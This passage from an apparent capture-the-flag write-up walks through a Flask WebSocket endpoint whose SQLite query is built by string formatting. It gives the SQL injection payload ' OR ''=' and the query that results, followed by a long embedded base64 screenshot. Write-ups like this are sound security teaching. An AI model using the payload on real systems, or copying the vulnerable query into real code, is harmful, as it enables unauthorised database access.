ws.send(data.uAgent); }; ws.onmessage = function (evt) { alert(evt.data); };}``` Looking in the source behind the `/req` endpoint in `app.py` we see ```[email protected]("/req")def req(ws): with app.request_context(ws.environ): sessionID = session.get("id", None) if not sessionID: ws.send("You are not authorized to access this resource.") return uAgent = ws.receive().decode() if not uAgent: ws.send("There was an error in your message.") return try: query = db.session.execute( "SELECT userAgent, url FROM uAgents WHERE userAgent = '%s'" % uAgent ).fetchone() uAgent = query["userAgent"] url = query["url"] except Exception as e: ws.send(str(e)) return if not uAgent or not url: ws.send("Query error.") return subprocess.Popen(["node", "browser/browser.js", url, uAgent]) ws.send("Testing User-Agent: " + uAgent + " in url: " + url) return``` Notice our input is used in an SQLite query, and in an unsafe way! Looks like we should have SQL injection. In our case the query returned `None` meaning `query["userAgent"]` failed, giving the error we saw. Let's try entering `' OR ''='` which would result in the query `SELECT userAgent, url FROM uAgents WHERE userAgent = '' OR ''=''`, meaning everything in the `uAgents` table should be returned (though notice we only `fetchone` so we'll only see the first result). ![](data:image/png;base64,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